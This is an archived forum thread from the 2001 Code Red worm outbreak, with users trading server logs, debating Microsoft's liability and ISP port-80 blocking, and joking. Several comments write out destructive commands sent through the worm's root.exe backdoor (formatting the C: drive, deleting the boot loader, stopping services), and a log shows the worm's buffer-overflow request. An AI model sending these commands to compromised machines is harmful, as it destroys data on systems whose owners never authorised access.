Microsoft feature?

[sjonke]

Noticing code red scanning my OS X Mac, I contacted the owner of the offending machine (actually the net admin on which the machine resided) and found out that the user of the computer (a portable) did not even know that he was running IIs.

Re:Microsoft feature?

[EastCoastSurfer]

If you do a default installation of Win2k Pro it does not install the World Wide Web Publishing Service.(at least in my experience) The win2k Server will install it by default.

Re:Microsoft should be sued

[NoBeardPete]

The important difference is this - gun manufacturers typically make a product that works as advertised, and if anyone gets hurt it's because the owner (or someone else who got their hands on the gun) used the gun in its intended manner. At this point, the gun behaved exactly as advertised, but was maliciously used to harm someone.

Microsoft's current position is closer to that of a car manufacturer that sells cars that explode when you expose them to a shock wave (as might be caused, say, by a car exploding in the next lane). You can use the car exactly the way you are supposed to, following all of the instructions in the users manual, but if you didn't notice the little publicized document from the manufacturer mentioning the problem and describing how to fix it, you still get exploded.

When car manufacturers do this, they are expected to 1) agressively try to contact any and all customers who might have their faulty product, 2) very likely perform a recall of said faulty product, and 3) still get their asses sued off anyway.

I think that's more the pertinent liability model.

horrible thought

[hex1848]

*if anyone's been under a rock the last month and still hasnt patched, here is a good reason to* looking at our webservers log files we have 1000's of ips addresses to infected machines with the root.exe back door. im not going to post any code but it would be trivial to loop through the log file, grab the infected ip addresses, and send out a bunch of :80 requests: /scripts/root.exe?/c%20format%20c:

There should be a total recall!

[2Bits]

When a car manufacturer screws up a specific model of car, there's a recall (e.g. Ford Explorer). When a drug manufacturer screws up a specific batch, there's a recall (e.g Bayer). When a medical equipment manufacturer screws up, there's a recall (e.g. asthma spray). When a toy manufacturer screws up, there's a recall (e.g. recent example, anyone?)

The software manufacturers should be required to recall their faulty products, and the consumers should get refund, or get a new not-faulty products (until new problems are discovered, that is).

And we should see a massive improvement in MS softwares, if they want to survive. I can't imagive they can survive if they have to recall everything single product! I guess Bill Gates might as well declare MS bankrupt, instead of loosing everything.

Re:There should be a total recall!

[datarat]

When a car manufacturer does a recall, they fix the vehicle in the cheapest manner possible that will correct the problem. But the consumer STILL has to bring the vehicle in. Where's the difference with applying a free patch?

I think you're letting your anti-microsoft zealousness cloud your thinking.

Blaming the producer is irresponsible. Mistakes get made and you fix them as fast as possible. If the fix is available, and it's unused, then who exactly is at fault?

Mozilla is the cure

[b1t+r0t]

Download the latest Mozilla and read the version notes for 0.9.2 to see how to fix your setup file to kill pop-up ads. I've been pop-under free for a couple of months now.

As usual, the cure is to ditch the SmallLimp crapware and replace it with mature open source code.

Re:Mozilla is the cure

or maybe he could stop trying to find the elusive free pr0n.

Code Red IV?

[the_tsi]

Maybe us open source folk should write a new Code Red version that uses the same explot and installs a service pack after it gets in, and then erases all the nasty things out of the scripts directories that the other code reds put there...

...then it automatically sends the maintainer a bill for our services.

-Chris

Re:Code Red IV?

[radja]

what do you think we are..? german lawyers?

//rdj

IPs

[spinfire]

I have received many hits, from DSL users on my local subnet unaware they are even running a server to a Bank's website. With the news that hotmail's own server were compromised i think it becomes neccessary to view this worm with a careful eye.

I even got repeated hits from the "Bank of Taccoa"'s website, meaning the bank was not aware their servers were being hit. Needless to say, I didn't try the backdoor out on that IP...

Here is a complete list to date

Re:IPs

[Fez]

The funniest one I've seen so far (or maybe the saddest) is a law firm "Alleguez and Lieb Attorenys at Law" (finding the infected machine is left as an exercise for the reader)

As a rule I don't try exploiting back, even more so against a law firm. Makes one wonder what would happen if they were actively compromised though. I'm sure someone would end up sued.

Hey at least you can get web traffic

[Diesel+Dave]

My connection is AT&T broadband and my asshole hurts. No mas ATT! No mas!

code red

[UncleBoy]

all the requests to port 80 on my router log are from @home
i wonder who is doing more to slow down the net

So doesn't that mean Microsoft was lying?

[Myself]

When Microsoft said that customer data wasn't exposed during the Hotmail infection, wouldn't that seem to contradict what we know about the worm?

Geee....

[isorox]

just grepped my log and spotted this

195.146.151.70 - - [05/Aug/2001:19:44:17 +0100] "GET /default.ida?GGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG GG GGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG GG GGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG GG GGGG%uab30%u2ac5%ucbd3%u34a4%u
ab30%u2ac5%ucbd3%u34a4%uab30%u2ac5%ucbd3%u34a4%u ab 30%uab30%u8190%u00c3%u0003%u8b
00%u531b%u53ff%u00a2%u0000%u00=a HTTP/1.0" 404 279 "-" "-"

I'm guessing this is it..

Re:Geee....

[dermotfitz]

personally I think you are a liar.

Re:Geee....

[isorox]

I'm sure you do - its there. Date's a bit old, which makes me think its not a real worm, but someone playing arround - after more investigation (reading the log, not just grepping for default.ida), it looks like someone was playing arround.

195.146.151.70 - - [05/Aug/2001:19:43:46 +0100] "GET /~iso/ HTTP/1.1" 200 1326 "
-" "Links (0.96; Unix)"
195.146.151.70 - - [05/Aug/2001:19:43:53 +0100] "GET /~iso/ HTTP/1.1" 200 1326 "
-" "Links (0.96; Unix)"
195.146.151.70 - - [05/Aug/2001:19:44:17 +0100] "GET /default.ida?GGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG GG GGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG GG GGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG GG %uab30%u2ac5%ucbd3%u34a4%uab30
%u2ac5%ucbd3%u34a4%uab30%u2ac5%ucbd3%u34a4%uab30 %u ab30%u8190%u00c3%u0003%u8b00%u
531b%u53ff%u00a2%u0000%u00=a HTTP/1.0" 404 279 "-" "-"

Re:Geee....

[dermotfitz]

ok I believe you.
didn't mean to be mean.
:)

Can the internet community sue microsoft?

Considering its a typical M$ security flaw causing degradation of the web, some businesses might be able to put a $ figure on the cost this has had to their business. So can Microsoft be sued? I would love to see a class action against that monoply...

Re:Can the internet community sue microsoft?

[optikSmoke]

IANAL, but don't you technically pay for the liscence to use the software, not necessarily the software itself. Therefore use of the software is restricted by the EULA because that's what you paid for, and you don't own the software. On the other hand, like you said, you don't get to see the EULA before purchase............

Re:Can the internet community sue microsoft?

[BattyMan]

OK what if you made the liability limit the purchase price of the software?

That would completely save the FSF/OSS developers, but the Empire, who's grown _very_ rich by selling shoddy crap, might lose some money.

And I don't think it's totally unreasonable for a software customer to have _some_ assurance that the product he's paying hard ca$h for might just actually work. In most industries, this is called a warranty, but the software industry seems somehow magically immune to consumers' expectation of this, as well as the general expectation of a product's basic safety. People won't buy a coffeepot without a warranty, what's so special about computer software?

I swear, I've yet to buy a commercial software program that actually _worked_! They're crap! The publishers of that shit need to be held to _some_ standard of "merchantability" or _something_!

Perhaps something along the lines of: "We've made every reasonable effort to assure that our software is bug and problem free, and performs essentially as described in the instruction manuals. Unfortunately, we can't control the effects that _other_ software in your computer may have on ours, and while our support staff will make reasonable efforts to help you run our software, proper operation may not be possible in all circumstances. In this case, you should return the software, including all original media and materials, with a notarized affadavit to the effect that you have been unable to use it and retain no copies, to our customer service department along with a copy of your receipt. A refund will be sent to you for your purchase price, along with an apology for your inconvenience. We value your business and hope we will be able to solve your difficulty in our next product release."

Contrast that with the gist of the M$ EULA: "This software isn't warranted to do a damn thing. Don't come running to us if it doesn't work, all risk is on you. If it doesn't happen, you're screwed. We don't care. We don't have to."

The M$ EULA pisses me purple every time I see it. What a crock of shit!

And yet you agree to it when you _buy_ your computer! (I'm in the market for a laptop). It applies to software which you have no choice but to buy!

OSS is a different issue, because the developer has no control over what someone might do with his code, and what the consequences of that might be, but a monolithic, binary-only, shrink-wrapped (or preinstalled on the machine!) totally controlled-by-the-publisher black-box software package over which the _user_ has little to no control shouldn't be entirely the user's responsibility to understand and maintain.

This was always my problem with M$. There was too much that had to be done to their code to make it useful, and too little information or latitude given to the luser to allow him to fix it himself.

Imagine how messed up it would be if I could sue because I designed my real-time aircraft control system around the Linux 1.0 kernel and BIND?

If you design a real-time aircraft control system around Linux 1.0 and BIND, you should maybe _be_ sued - by the estates of the people killed in the crash!

Re:Can the internet community sue microsoft?

[BattyMan]

Yeah, the EULA totally bends the customer over.
See goatse.cx for a graphic analysis. (but be advised that there's an obscenity warning out on that site!)(If only M$ would give you a similar obscenity warning before you read their EULA!)

But is it actually enforceable?

When I tell M$ cu$tomers about various provisions in the EULA in an attempt to explain to them how badly they're being screwed, the usual reaction is complete disbelief that anything so ridiculous could ever be enforced in a court.

Isn't it time somebody _tested_ this horseshit to see? Infineon had the glands to take RamBus to court, after other manufacturers caved and settled, and look what happened to RamBus! What if someone sued M$ for some major damages and a jury said: "Yes, if your software makes the customer's computer catch fire, burning down his house and killing his bedridden mother, M$ _has_ some liability in the matter!"?

Re:Can the internet community sue microsoft?

[mini+me]

Well since I don't run W2K on the server, I didn't read the EULA. Since I haven't read it, I haven't agreed to it!

This Code Red worm still used my resources however. The processing power it took to process the request, the bandwidth wasted on the request. Am I not entitled to a lawsuit against Microsoft? Here is the chance for all non-Windows web host owners to join together in one massive lawsuit against the Evil Empire

Re:Can the internet community sue microsoft?

[darkPHi3er]

Read the MS EULA (End User License Agreement)

for example, if you load MS/NT/W2K on a PC that controls your companies Fire Alarms and because of a virus/worm/???? your Fire Alarms are down when a fire starts and burns your business to the ground (including physical injury to staff)....

MS is NOT liable for one red cent of any kind of damagaes....

MS was certainly not the first S/W company to immunize themselves from product liability through licensing....

BUT, the MS license agreement is one way non-negotiable (Take it or Don't Load It), not subject (by the user) to any modification under any circumstances (if a consultant GUARANTEES anything about Windows performance that's not binding on MS) and best of all....

the mere fact that you install the s/w is COMPLETELY BINDING ON YOU AND ALL YOUR COWORKERS...

SO, if over your loud objections, your IS/IT dept installs W2K in your department and it crashes another app (say an Oracle8 database on Solaris) and destroys it completely, well, the mere act of installation binds you completely, even if you didn't want it, didn't need and told everyone that if ruin your existing applications...

NOW THAT'S ***INNOVATION***

Re:Can the internet community sue microsoft?

[justdewittall]

>But the *nature of the internet* is such that once a box is connected, ALL traffic is authorized to at least connect to the machine, and from there is limited only by you and your software.
----------
So Al Gore is responsible?
No, Really.
You don't forgo any rights by connecting to the Internet. Sure, your ony asking for trouble if you are not aware of the dangers of running Win2k/IIS. But the precedent is certainly there to sue. Somebody had to make MacDonald's label coffee "WARNING: HOT"
Or if they knew about releasing the poduct without proper security, why is it not any different than putting out a car with perforated seat belts?

Re:Microsoft should be sued

[pointym5]

Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

Or else his PC vendor sold him the thing pre-configured with Win2K Server. That doesn't seem unlikely to me at all. And in any case, an OS installation that includes turning on a web server by default seems stupid.

Some numbers and a comment

[ebrandsberg]

For people that don't run a webserver, here is what I'm getting out of this command (note that my log is probably a LOT less massive than others because I'm in a relatively NT free IP block, with mostly Linux servers):

grep "Aug.*ida" httpd.log cut -f4,7 -d' ' |cut -c2-7,22-40 |sort -n|uniq -c
23 01/Aug /default.ida?NNNNN
26 02/Aug /default.ida?NNNNN
21 03/Aug /default.ida?NNNNN
24 04/Aug /default.ida?NNNNN
4 04/Aug /default.ida?XXXXX
14 05/Aug /default.ida?NNNNN
13 05/Aug /default.ida?XXXXX
1 05/Aug /x.ida?AAAAAAAAAAA
9 06/Aug /default.ida?NNNNN
34 06/Aug /default.ida?XXXXX
9 07/Aug /default.ida?NNNNN
38 07/Aug /default.ida?XXXXX
2 08/Aug /default.ida?NNNNN
29 08/Aug /default.ida?XXXXX
3 09/Aug /default.ida?NNNNN
44 09/Aug /default.ida?XXXXX
2 10/Aug /default.ida?NNNNN
29 10/Aug /default.ida?XXXXX

This was run at 11:45 PST, meaning today may be even worse for the XXX version than yesterday, probably about 60 attempts before the end of the day. There was a discussion about a code red removal worm, which given how long this thing has been attacking, and the results, is probably the ONLY way this thing is going to be removed. Why isn't the US Government issuing such a worm to protect national interests? It could operate by infecting only machines that attempt to infect the local machine, thus not probing any non-infected machines itself, if you arn't infected, it won't touch you, if you are, it will. Seems simple enough to me. At the rate of propogation this thing works at, it would quickly decimate most if not all infections very quickly.

Re:K5 contest

[matguy]

I would imagine that one could at least make it pop up a warning on the screen prompting the user of the needed patch (complete with direct link) and sound the pc-speaker which could alert anyone nearby. (someone walking by hearing a beep-beep would probbaly at least turn on the screen.) Something like that should at least help.

Tested, working... Effective.

/root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

Bye bye boot process...

Re:make some money off banner ads

[TheMidget]

> host banner ads on your server with the file name of /default.ida.

Won't work. The worm won't follow redirects nor download any pictures (banners) from the page.

Re:I saw that Reuters story earlier

[Shane+Hathaway]

Your logs (in your sig) indicate that almost all attacks are coming from hosts with numeric host names. Probably home users. Most likely they'll never know they are contributing to the problem.

Realistically, the only way to reach those people is through public channels (TV announcement, perhaps) and anti-worms.

Re:Bah.

[Delphis]

I've seen 700 or so on our sites here.. (a mix of the first and second ones, judging by the differing urls). On my own personal machine there's another 350 or so.. Stupid really, considering none of the sites are 'high profile' .. it all just comes down to network address ranges I think. The networks are just scanned and each IP attacked aren't they?

Cisco Routers

[vulg4r_m0nk]

for anyone w/ Cisco 600 series routers, blocking port 80 is the only fix the for problem of the routers hanging.

It took some time for my ISP to figure this out. They spent two weeks saying that web access just had to be denied, but that's insufficient.

And by the way, the fact that Verizon called is downright heartwarming ;) -- Qwest flat refuses to accept inquiries!

Re:Cisco Routers

I was called by Qwest last night to inform me that of CR and the problems with cisco 6xx routers, and where to find info on how to fix it. According to the phone drone they were getting 50,000 calls a day.

Mutations?

[vinnythenose]

I love how in the news they talk about the latest "mutations" and such of code red. People haven't quite caught on that the virus does not modify itself the same way a "real world" virus can. Someone else is simply re-writing it differently. Now, unless something extraordinary has happened while I was asleep and virii can in fact modify themselves to attack in different ways, each different than the one before, then spray me red and call me a monkey's lost uncle.

What to do...

Write a script named index.ida that when called will automatically use Samba do send an SMB message to the server that scanned you. The message sent should contains something like:

PATCH YOUR DAMN SYSTEM!

Warning: Virus Alert!

[WillSeattle]

Warning, you may have the Code Red virus on your machine! If you get an email or read a post with the subject line of "Warning: Virus Alert!" it has already infected your machine.

For the fix, follow this link and execute the code you find to fix your system.

Re:Morality of Counter Measures?

[FakePlasticDubya]

I wasn't aware of a cmd line command to shut down a machine... is there one? There is a command to shut down IIS I believe.

Code Red is trying to eat me!

[sgt_getraer]

So I get a call from my ISP Verizon yesterday. They ask me if I have been having problems with the Code Red virus.

"Nope, but my service is shot to hell. You guys must be having some serious problems."

The representative goes on to tell me that I can 'fix' the code red virus by unplugging my router and plugging it back in. I try, vainly, to inform him that the virus is doing nothing to my hardware and the reason I'm having problems is that it's making swiss cheese of the SERVERS...

Anyway, the guy finishes his script and hangs up. So is Verizon trying to cover up their ineptness by implying that the customer is infected, and not them? Proactivly trying to shift the blame to get less tech support call? Very strange indeed...

Re:Code Red is trying to eat me!

[garcia]

They probably understand the fact that there is VERY little that they can do (other than blocking port 80) than inform their users of what to do. At least they are giving "Worm? I have a worm in my computer? There's no dirt in there" guys the information.

As much as I hate Verizon and their bullshit, at least they are trying to do something.

Gotta give em SOME credit ;)

Re:Code Red is trying to eat me!

[BeBoxer]

Code Red will crash some Cisco 675 DSL routers. That's probably why they are calling.

Re:Code Red is trying to eat me!

[b1t+r0t]

If your router is a Cisco and hasn't had a firmware upgrade in the past six months or so, it may have a crashing bug that can be triggered by Code Red's exploit. But if you have _any_ service, this is not the problem, and the guy who called you was a total idiot.

Re:Code Red is trying to eat me!

Patching the CISCO 675/678 to CBOS 2.4.1 does not fix the problem even though the CISCO web site says that it will. Even power cycling the CISCO only fixes the connection until the next port scan blows its mind again. You have to console in, disable web access and change the web port like this: telnet IP_ADDRESS(CISCO675) password****** enable set web disabled set web port 8080 write reboot At first I tried jsut disabling the web but every time the Cisco 675 got scanned by CR it would lock up. But changing teh port number to something other that 80 fixed it, been going for 3 days without a problem now.

Re:Bah.

[spectral]

Wow, that URL looks strangely familiar.. It's almost like I'd seen it somewhere before. Oh yea, in the article itself. Were you going for 'Informative', 'Insightful', 'Funny', or just 'Plain Fucking Stupid' ..

I swear, we need a 'Karma Whore' moderation.

Re:Bah.

[isorox]

Actually .jsp is a java page, tomcat plugin availabl for apache and a dedicated java servlet servlet server is availabl for linux (and I guess windows)

now, .asp is active server page, what you are thinking of.

Re: 622 since 08/01/01 at 00:00

[ph8ts2l]

Re: 622 since 08/01/01 at 00:00

Re:Microsoft should be sued

[norton_I]

The difference between guns and windows is that guns do damage when working as designed. A gun is designed to destroy things you point it at, and that is what it does. It can be used legally or illegally, and manufacturers really can't do much about it.

IIS is causing damage because of a design flaw. If you bought a gun and it blew up in your hand due to a design flaw, the manufacturer would certainly be at fault.

I am not convinced that MS should be lible for this, I am just saying that your analogy is flawed, and that in the world of physical products, MS would be hit with a billion dollar lawsuit right now.

Watch out AT&T!

[CM39]

Well one use for all these machines if port 80 is back up before all those infected are fixed, would be for someone who knows how to exploit the backdoor code red II leaves behind, to use them to perform a DOS attack on AT&T.

I hope I just gave someone with the knowledge to be able to do it a good idea :-)

Just kidding....sort of

Re:Microsoft should be sued

[javahacker]

Correction, the version of IIS that is being used by Code Red to get control of machines doesn't run on Win9x or ME. Windows 98 at least offers the Personal Web Server, which is basically an earlier version of IIS.

My Linux Mandrake V8.0 cautions me about possible security problems if I select servers (like web of ftp) and have them active when I install it. The Microsoft Windows installer does not warn me.

Most of the non-administrators with IIS on their machines probably had no idea that they were creating a security problem by inslalling IIS. They probably don't have firewall software or hardware either. They don't know the net is a dangerous neighborhood, but Microsoft should.

The IIS patch was not (last time I looked) available on Windows Update, which is the place most users would go to find it. Shouldn't it be there as an important security fix? This is a serious oversight by Microsoft. They distributed fixes for other security problems on Windows Update, but not for the most serious one to date.

Re:ok you bigots :)

[dermotfitz]

I hope you weren't serious with that post.

Re:I think you're on to something...

[Fluid+Truth]

I know that I'm a little late on this, but...

If Bill Gates had a nickel for every time Windows crashed...
..oh wait, he does

If you like that, you should go to http://www.stuff.halibut.com/ and buy the t-shirt that's similar.

huh .. when does the prequel come out ?

[freaker_TuC]

They should have started with version IV instead of I ...

then they could do some prequels 10 years later ...

codered IV: A new hope
codered V: The code strikes back
codered VI: Return of the code

...

codered I: The iis menace.

Re:Oddly enough...

[starseeker]

That's because car safety has emotional and financial strings attached. You don't see people getting truly upset about computers unless it is either costing them money in a way they can understand easily, or kids are getting into trouble. The issue of poor software design isn't one people can readily understand, just as a physical intruder is easier to understand than an electronic one.

Version 3? Don't think so.

[Todd+Knarr]

My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

Re:Version 3? Don't think so.

[grytpype]

Oh, so that's why Slashdot sucks so much. Thanks for the info.

Re:Version 3? Don't think so.

[EvlG]

Read the /. FAQ. Taco speaks directly to your concern about verifying stories.

Essentally, it is something like Taco sees /. as different from other media, in that readers verify and expound on the stories. /. merely reports the story, with some sanity checking (like not reporting something without even a link). What happens after that is up to the readers.

Sofware Insurance

[Midnight+Thunder]

Companies should instead be taking out insurances against possible errors in an application. If they wish to claim then they have to prove that a) they provided the required safe guards to avoid exploitation and b) had in place a good back-up plan in case something did go wrong.

If I was a that dependent on some other technology, such as trucks for goods transportation, then I would ensure that there was a back-up plan in place in case the truck broke down - maybe a second truck, a reliable mechanic, or both.

Of course if this is John Doe with and illegal copy of IIS, then they probably are not going to take the time to protect themselves. For the paranoid: maybe this is MS spreading the virus to find out where the illegal copies of IIS are? If that is this case then we should call it CodeRed-XP ;)

Re:And more will come...

they clicked "YES" at some point in an installation without really understanding what they were saying YES to.

Oh, you mean like at the EULA?

Re:Microsoft should be sued

It's been there at least since the first Slashdot article. I patched my server right away. Check under Critical Updates.

Re:and another thing...

[norton_I]

I don't have any objection to ISPs doing that *by default*. I just think they should be able to selectively unblock that for customers who want it, with the stipulation that if you or your computer do bad things with it (like get code red) they will shut of access completely until you fix it.

@Home just unilaterally shut of all port 80 access (they have had netbios ports shut off all along, I believe).
Sure I can move my web server to port 81 or 8080, but as a responsible netizen, it pisses me off that I have to.

And don't whine about me using your bandwidth. I use my web server for personal use, on a service I paid for. It probably uses a whole 100 KB/day. If ATT@Home can't handle that, they need to upgrade their pipe.

Re:Microsoft should be sued

On W2K Pro, first you need to select 'custom' networking or some such, then Add Service, then specifically select Internet Information Services. It's not easy to do accidentally.

@Home's response (to me)

[dagnabit]

Got this back after sending abuse@home.com a short list of IPs culled from my Apache log:

Thank you for your report of Code Red probes.

While we are not allowed to give out specific information regarding subscriber identity, or specific action taken without legal process, we have identified the offending user and taken appropriate action against this account. If you are receiving 'get' command strings from an @Home user or users, directed at port 80, it is likely that that originating machine has been compromised by the Code Red virus. One of the effects it has is to cause infected machines to search for other machines that would be exploitable. Machines that are running unpatched versions of Windows NT Server or 2000, with a Web Server and IIS (Microsoft Index Server 2.0 or Indexing Service in Windows 2000) are vulnerable to this exploit. If you are NOT running this OS and services, your computer is not subject to this particular compromise.

So it sounds like they are trying to do something, and apparently sending in IPs can help them weed out problem servers... slow, but better than nothing.

...and they didn't even say anything about me running a server in the first place!

Re:Bah.

[Aqualung]

root@localhost:/dir/apache-ssl/logs# ./crhit.pl
Hit 9400 times by Code Red v1
Hit 9418 times by Code Red v2
Code Red 1 avg/host: 127.027027
Code Red 2 avg/host: 127.270270
Total avg/host: 254.297297

This is over about 80 configured virutal hosts. It's a klugy script since it also checks the SSL server logs, which I don't think are attempted by the virus. The IP addresses cover two class C's for all our hosts.

Re:Just an obvious question or two...

yes
it ate up 100% of our outbound T1 bandwidth.
it was really going crazy making outbound connections to random IPs.
the infected machine was affected though not to a standstill.

Re:Wow

[mickeyreznor]

Win2K and NT with the IIS service automatically running and they haven't noticed???

If I had done an express install, i probably wouldn't have noticed. I did a custom install, however. So my question to you is, are you saying that people who use an express install are incompetent?

...

actually,

http://IpOfHackedMachine/scripts/root.exe?/c+net+s top+server+/y

Ok. Here's better names.

[hivolt]

How about
Code Red: The Phantom Worm.
Code Red II: Attack of the Clone
Code Red III: Media's Imagination
Code Red IV: A New Worm
Code Red V: The Worm Strikes Back
Code Red VI: Return of the Worm

Re:Ok. Here's better names.

[BilldaCat]

You suck. Go away. Forever.

Take your so-called sense of humor with you.

Bad piggyback, but..

[steveo777]

What does code red do? I mean, besides spread like horny rabbits over a field of lush, poor-security Windows machines?

sorry 'bout the somewhat off-topic, but I wanted this to get noticed, I'm going mad.

Re:Bad piggyback, but..

puts cmd.exe in the /scripts directory where it is open to the world and can be used to execute any operation on the machine (format c:\ anyone?)

Re:Help me out on this one...

[Nightlight3]

in this case, default.ida takes everthing after that number of letters and runs it like it were a program.

What kind of server buffer handler would execute the content of the buffer? You have to go out of your way doing stupid things to make it happen. Who are these morons at Microsoft who write that kind of code?

CodeRed and SirCam: Free Software Plot?

[kaladorn]

Not to be Oliver-Stonian, but it seems to me that
the profligate number of bugs written to take a
hack at the MS security vulnerabilities in IIS,
Win xx, etc. might be some sort of covert action
by free software types.

Now, before anyone starts frothing at the cranium,
I don't lump all free software types in this
class. Nor can I say with any certainty the case
I suggest is so.

Instead, I just suggest it for a thought.

If Linux is the 2nd largest OS, then why don't
we see far more Linux-specific hacks? You could
argue that it is the stability and security of
the system. Partly, I'd buy that - MS is kinda
weak in the security department. But even so,
you'd expect to see some MS Tiger Team secretly
releasing something nasty to take out the
competition. But that doesn't often seem to be
the case.

And the MS attacking virii multiply, in form as
well as instance.

It is just barely possible this is someone's way
of saying "Sod Off!" to Bill and Co. If so, though
the sentiment is laudible, the action is not.

Every time one of these virii hits, it "justifies"
more restrictive practices in terms of code
release, security protocols, limiting interop
capabilities, buttoning down and monitoring the
net, giving the police and Governments more power
to tackle anything they think needs their dirty
paws on the Net, etc.

Maybe what we really need is some White Hat
Crackers to take a real stab at nailing these
virus-writing pussbags. A dose of their own
medicine (or a repeated encounter with a solid
surface) might show them the error of their ways...

Tomb.

Re:CodeRed and SirCam: Free Software Plot?

[Tony-A]

why don't we see far more Linux-specific hacks?
The exploit is not in IIS but in some Index Server thingee, with no rational explanation as to what it is or why it is. To fix the problem, the right patch has to be found on Microsoft's servers. This seems to be too much trouble for Microsoft to do with Hot Mail and their own internal servers.
If we did have a CodeRed for RedHat, it would play out much differently. Lots of explanations and fixes. If I'm feeling paranoid, I can download the fix from some random site instead of priority.redhat.com, or even better, just kill the service that I don't want or need. The main difference is that the steps necessary to clip its wings will be taken.

Re:More info on Code Red III

[V50]

The sad thing is, awhile ago one of my Mom's friends, the type who can't understand there is more to a PC than C:\WINDOWS\DESKTOP\, got one something like this in the mail.

She forwarded it on to everybody she knew, genuinly panicked, wondering how it could do all that, beliving every word...

Re:Obviously,IIS is *vastly* more popular then apa

There are between 8 and 9 million IIS hosts on the Internet today. Want to know how many apache hosts there are? Here's a hint... A LOT.

Re:An ETHICAL way to Anti-Virus

[MavEtJu]

I've made a small script to do this. It takes the hostname or IP address of a machine to find out information from the whois-database or the SOA fields of the zone.

It's available from http://www.mavetju.org/networking/tools.phtml as coderedspammer.

Don't think that this will solve your problems, because there are many many badly inconfigured mailers/dns-servers/whois-databases on the internet. See http://www.mavetju.org/networking/whymailfails.pht ml for an overview.

Edwin

Re:Copycats

[analog_line]

Whaddaya mean it's dead? If the traffic light on my cable modem is any indication, it's still alive and kicking. Maybe it ain't "cool" anymore but it's still out there and making a mess of things.

The only thing that's going to "let it die" is if the stupidity/incompetence that this virus so neatly reveals is cured and people patch their fucking servers. Until then, there's plenty to talk about. Hell, there's more to talk about. It's getting close to a month that systems have been getting hit by this virus and people are still being infected when an easy solution has been available for over two months. What planet are these people on?

III

[chinakow]

I am starting to actually believe that someone is doing this to prove a paoint about MS(insecure) and about people(complacent), sorta killing 2 birds (or a few thousand for that matter)with one stone, and doing a very good job of drawing ALOT of attention toboth points,just my thoughts


Jon

What a golden opportunity ...

[nobby]

Well, the obvious way to treat a portscan from a code red infected machine is ...

[nobby@nobby]$ grep "Packet" /var/log/messages
Jul 15 20:53:32 pat kernel: Packet log: input DENY ppp0 PROTO=6 xx.xx.xx.xx: 80 203.66.66.66.66:1040 L=...

[snip]

[nobby@nobby]$ whois 66.66.66.66

[snip]

Server Name: foobar.luser.com
IP Address: 66.66.66.66
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com

[nobby@nobby]$ cat > unsolicited.email
Dear Sir,

It has come to my attention that your server FOOBAR
has been infected with a variation of the CODE RED
worm. I would like to draw your attention to our
one-time only introductory offer of a complete new
webserver installation on a platform GUARANTEED never
to be infected with the CODE RED worm ever again!

That's right! For the one time payment of a low, low
price of only $2999.95, we can completely rebuild your
web server with a platform GUARANTEED never to be
infected with CODE RED ever again ...

This is a never-to-be-repeated once-in-a-lifetime
offer!

Yours Sincerely,

[insert name here]
^D
[nobby@nobby]$ for a in administrator bofh 1337_MCSE_d00d ceo webmaster; do mail -s "Your web server has been infected ..." &lt unsolicited.email ${a}@luser.com; done

default.ida

fix the spaces

j00 h4v3 b33n 115r353+ 0wnz0r3d

";
system ("/bin/echo $REMOTE_ADDR 0wnz0r3d >> /var/log/0wnz0r.log");}
else
{ print "n0 0wnz0r f0r j00

";};

if ($owned2) { print "j00 h4v3 b33n 5|-|u+d0\/\/n";
system ("/bin/echo $REMOTE_ADDR 5|-|u+d0\/\/n >> /var/log/0wnz0r.log");}
else
{ print "n0 5|-|u+d0\/\/n f0r j00";};

?>

Re: The solution

I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

Obvious! Put a story about them on slashdot, with a link to their server. They'll be shut down in no time!

Even better: put a Redirect command in Apache's httpd.conf and redirect each worm attempt to Microsoft so they can share the results of their crappy, buggy code.

Re:Microsoft should be sued

[TheMidget]

> but even I will say that a maker of a defective gun should be liable.

But the point of most of these lawsuits against gun makers is that the plaintiffs want to hold the manufacturers liable even if the gun works as expected, i.e. kills when somebody pulls the trigger, which is kinda ridiculous... It's a little bit as if Microsoft got sued by the MPAA, because an IIS somewhere is serving up DeCSS...

Re:How can you get a BIGGER back door than CRII?

With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised.

Sorry, but no. You don't have write access to \Documents and Settings\All Users\Desktop, and you can't reboot the server or shut down services. Not that I've tried or anything...

Ignorance or Apathy?

[CoachS]

It amazes me how, after all of the publicity, people continue to be absolutely ignorant about security. That extends to not applying important patches and to opening infected messages.

Just about every day our filters catch copies of SIRCAM and Hybris that some ignoramous somewhere in the world foolishly opened.

It's not a good reflection on human intelligence. And I don't mean this to be a rant; but really the media is full of information about this. Every responsible I.S. person I know spends considerable effort trying to educate their users. It's common sense and common knowledge that worms and viruses are out there. For some reason none of this sinks in and foolish users will get a bizzare message from a total stranger with an unknown attachement "asking for your advice" and plunge in and open it.

Maybe the Admin doesn't know every service running on all of his servers (I admit that I don't) but they should know how to quickly find out. As soon as word of Code Red came out, we checked our servers and identified any that were running IIS without our realization. We either removed IIS from those servers or promptly applied the patch. It's a simple process and an important part of being an Admin -- securing your systems. Apparently it's beyond a lot of people.

It's sad. Darwin would be disappointed.

-Coach-

And then automatically firewall...!

[Slur]

And it occurs to me that an even better addition to the script would be to automagically add the incoming IP address to the firewall chain/table to block it forevermore - or at least for a few weeks until the weather subsides.

I found that by simply adding about 5 IP ranges to my computer's built-in firewall I got rid of *all* the code red attacks. (This computer hasn't been running 24/7 so it's been pretty well hidden.)

